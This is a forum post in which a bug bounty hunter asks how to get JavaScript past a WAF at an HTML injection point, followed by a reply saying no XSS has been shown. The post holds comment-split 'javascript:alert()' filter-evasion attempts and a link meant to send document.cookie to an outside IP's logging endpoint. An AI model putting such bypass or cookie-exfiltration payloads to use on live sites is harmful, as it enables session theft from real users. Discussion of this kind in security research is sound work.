I am doing a bug bounty and i found an XSS injection point. However most tags are filtered and i have been getting no results in executing JS, i can do what ever HTML i want though
here are some examples as they show id WebDev Tools
<img title="test" maxlength="50" on*load="j<!-- -->A<!-- -->v<!-- -->a<!-- -->Scr<!-- -->ipt:<!-- -->al<!-- -->ert();"> <img title="test" maxlength="50" src="j<!-- -->A<!-- -->v<!-- -->a<!-- -->Scr<!-- -->ipt:<!-- -->al<!-- -->ert();"> i learned that any JS is filtered and ive been trying many bypass techniques, unicode is all filtered as well
I am also able to inject tags and the links work but when adding things like document.cookie it triggers the WAF.
<a href="http://38.47.239.XXX:5000/log_cookie?cookie=" + document="">XSS</a> (once i put .cookie it triggers WAF but i can do documentcookie(if that even helps))
im not sure if my comments are even effective because they appear when viewing with dev tools...
I am doing a bug bounty and there is a 1.7k bounty on things like executing JS, I am able to mess up the whole style of the page but thats not really a big deal.
does anyone have any techniques i am missing on bypassing WAF filters... It took me a long time to find this injection point, there has to be a way to execute JS..
or maybe there is entirely something different i can do?
all examples are how they show in devtools
hrefattribute, and I have no idea why you’re trying to use thejavascript:scheme in anonloadattribute. It’s nice that you can inject HTML markup, but this is very different from XSS. If you cannot even create a JavaScript execution context (like anonattribute or ajavascript:URL), then you have not found an XSS vulnerability.